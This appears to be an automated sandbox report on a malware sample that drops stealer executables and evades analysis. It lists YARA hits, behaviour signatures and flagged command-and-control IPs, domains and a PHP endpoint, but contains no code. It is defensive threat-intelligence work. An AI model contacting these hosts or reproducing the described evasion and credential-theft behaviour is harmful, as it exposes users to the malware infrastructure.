Source: Yara match File source: 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2604298529.0000000000E9E000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2531875867.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.2588138718.0000000000E9E000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2611179744.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2488093515.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2604161455.0000000000E81000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.2588009468.0000000000E81000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2632031246.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2685024844.00000000000F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2148, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545816 Sample: file.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 95 thumbystriw.store 2->95 97 presticitpo.store 2->97 99 34 other IPs or domains 2->99 121 Suricata IDS alerts for network traffic 2->121 123 Found malware configuration 2->123 125 Antivirus detection for dropped file 2->125 127 18 other signatures 2->127 9 file.exe 2 2->9         started        14 skotes.exe 4 25 2->14         started        16 6cadd3f0fd.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 107 necklacedmny.store 188.114.97.3, 443, 49730, 49731 CLOUDFLARENETUS European Union 9->107 109 185.215.113.16, 49738, 49814, 49849 WHOLESALECONNECTIONSNL Portugal 9->109 79 C:\Users\...\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, PE32 9->79 dropped 81 C:\...UB426480Z8XTJ7PLZ2E322TJ3DJ4.exe, PE32 9->81 dropped 163 Query firmware table information (likely to detect VMs) 9->163 165 Found many strings related to Crypto-Wallets (likely being stolen) 9->165 167 Tries to evade debugger and weak emulator (self modifying code) 9->167 185 2 other signatures 9->185 20 EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe 4 9->20         started        24 QPHIWB3GKESEWV8SSDAQV1GC2I70.exe 9 1 9->24         started        111 185.215.113.43, 49792, 49808, 49842 WHOLESALECONNECTIONSNL Portugal 14->111 83 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 14->83 dropped 85 C:\Users\user\AppData\...\275df0ca27.exe, PE32 14->85 dropped 87 C:\Users\user\AppData\...\1171a5b648.exe, PE32 14->87 dropped 93 5 other malicious files 14->93 dropped 169 Creates multiple autostart registry keys 14->169 171 Hides threads from debuggers 14->171 173 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->173 26 6cadd3f0fd.exe 2 14->26         started        28 1171a5b648.exe 14->28         started        31 275df0ca27.exe 14->31         started        33 num.exe 14->33         started        89 C:\Users\user\...\B1DZUXGXMC4OXONLCU5KVQ.exe, PE32 16->89 dropped 91 C:\Users\user\...\A5RXP2EPUMEJDLAL7A3JI.exe, PE32 16->91 dropped 175 Tries to harvest and steal ftp login credentials 16->175 177 Tries to harvest and steal browser information (history, passwords, etc) 16->177 179 Tries to steal Crypto Currency Wallets 16->179 35 B1DZUXGXMC4OXONLCU5KVQ.exe 16->35         started        37 A5RXP2EPUMEJDLAL7A3JI.exe 16->37         started        181 Binary is likely a compiled AutoIt script file 18->181 183 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->183 39 7 other processes 18->39 file6 signatures7 process8 dnsIp9 75 C:\Users\user\AppData\Local\...\skotes.exe, PE32 20->75 dropped 129 Antivirus detection for dropped file 20->129 131 Detected unpacking (changes PE section rights) 20->131 133 Machine Learning detection for dropped file 20->133 41 skotes.exe 20->41         started        135 Modifies windows update settings 24->135 137 Disables Windows Defender Tamper protection 24->137 139 Tries to evade debugger and weak emulator (self modifying code) 24->139 151 3 other signatures 24->151 77 C:\Users\...\5TAVJ2XDPW30B3ZI4A9E75FX93.exe, PE32 26->77 dropped 141 Multi AV Scanner detection for dropped file 26->141 143 Query firmware table information (likely to detect VMs) 26->143 145 Tries to steal Crypto Currency Wallets 26->145 113 185.215.113.206, 49890, 80 WHOLESALECONNECTIONSNL Portugal 28->113 153 3 other signatures 28->153 147 Binary is likely a compiled AutoIt script file 31->147 44 taskkill.exe 31->44         started        46 taskkill.exe 31->46         started        48 taskkill.exe 31->48         started        57 3 other processes 31->57 149 Tries to detect sandboxes and other dynamic analysis tools (window names) 35->149 115 youtube.com 142.250.186.142 GOOGLEUS United States 39->115 117 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 39->117 119 5 other IPs or domains 39->119 50 firefox.exe 39->50         started        53 firefox.exe 39->53         started        55 firefox.exe 39->55         started        59 5 other processes 39->59 file10 signatures11 process12 dnsIp13 155 Antivirus detection for dropped file 41->155 157 Detected unpacking (changes PE section rights) 41->157 159 Machine Learning detection for dropped file 41->159 161 4 other signatures 41->161 61 conhost.exe 44->61         started        63 conhost.exe 46->63         started        65 conhost.exe 48->65         started        101 push.services.mozilla.com 34.107.243.93 GOOGLEUS United States 50->101 103 telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 GOOGLEUS United States 50->103 105 prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 ATGS-MMD-ASUS United States 50->105 67 firefox.exe 50->67         started        69 firefox.exe 50->69         started        71 conhost.exe 57->71         started        73 conhost.exe 57->73         started        signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
34.149.100.209
 prod.remote-settings.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.243.93
 push.services.mozilla.com United States
15169 GOOGLEUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
188.114.97.3
 necklacedmny.store European Union
13335 CLOUDFLARENETUS true
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.186.142
 youtube.com United States
15169 GOOGLEUS false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
34.120.208.123
 telemetry-incoming.r53-2.services.mozilla.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
star-mini.c10r.facebook.com 157.240.253.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.1 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
dyna.wikimedia.org 185.15.59.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.186.142 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
dualstack.reddit.map.fastly.net 151.101.129.140 true
youtube-ui.l.google.com 142.250.184.238 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
necklacedmny.store 188.114.97.3 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
presticitpo.store unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
fadehairucw.store unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
thumbystriw.store unknown unknown
shavar.services.mozilla.com unknown unknown
crisiwarny.store unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ true
    		unknown
    fadehairucw.store true
      		unknown
      http://185.215.113.206/6c4adf523b719729.php true
        		unknown
        founpiuer.store true
          		unknown